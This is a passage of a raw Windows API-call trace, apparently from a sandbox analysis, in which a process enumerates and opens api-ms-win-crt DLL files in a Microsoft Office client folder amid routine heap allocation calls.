MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 83 [0099.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.731] GetFileType (hFile=0x27c) returned 0x1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.732] CloseHandle (hObject=0x27c) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.733] AreFileApisANSI () returned 1 [0099.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0099.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 83 [0099.733] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0aa952a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0aa952a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0c99389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50c0)) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0099.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.733] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0af5a16, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0af5a16, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0c4cdf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0099.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0099.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.734] AreFileApisANSI () returned 1 [0099.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 77 [0099.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.818] AreFileApisANSI () returned 1 [0099.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0099.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll") returned 77 [0099.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.818] GetFileType (hFile=0x368) returned 0x1 [0099.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.818] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.819] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.819] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.819] CloseHandle (hObject=0x368) returned 1 [0099.819] AreFileApisANSI () returned 1 [0099.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cf80 [0099.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8cf80, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll") returned 77 [0099.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.819] GetFileType (hFile=0x368) returned 0x1 [0099.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.819] CloseHandle (hObject=0x368) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.821] AreFileApisANSI () returned 1 [0099.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cd88 [0099.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll") returned 77 [0099.821] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0af5a16, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0af5a16, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0c4cdf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.821] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e086ac, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e086ac, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2365abe, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68fe0 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0099.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0099.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0099.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0099.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.822] AreFileApisANSI () returned 1 [0099.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 79 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 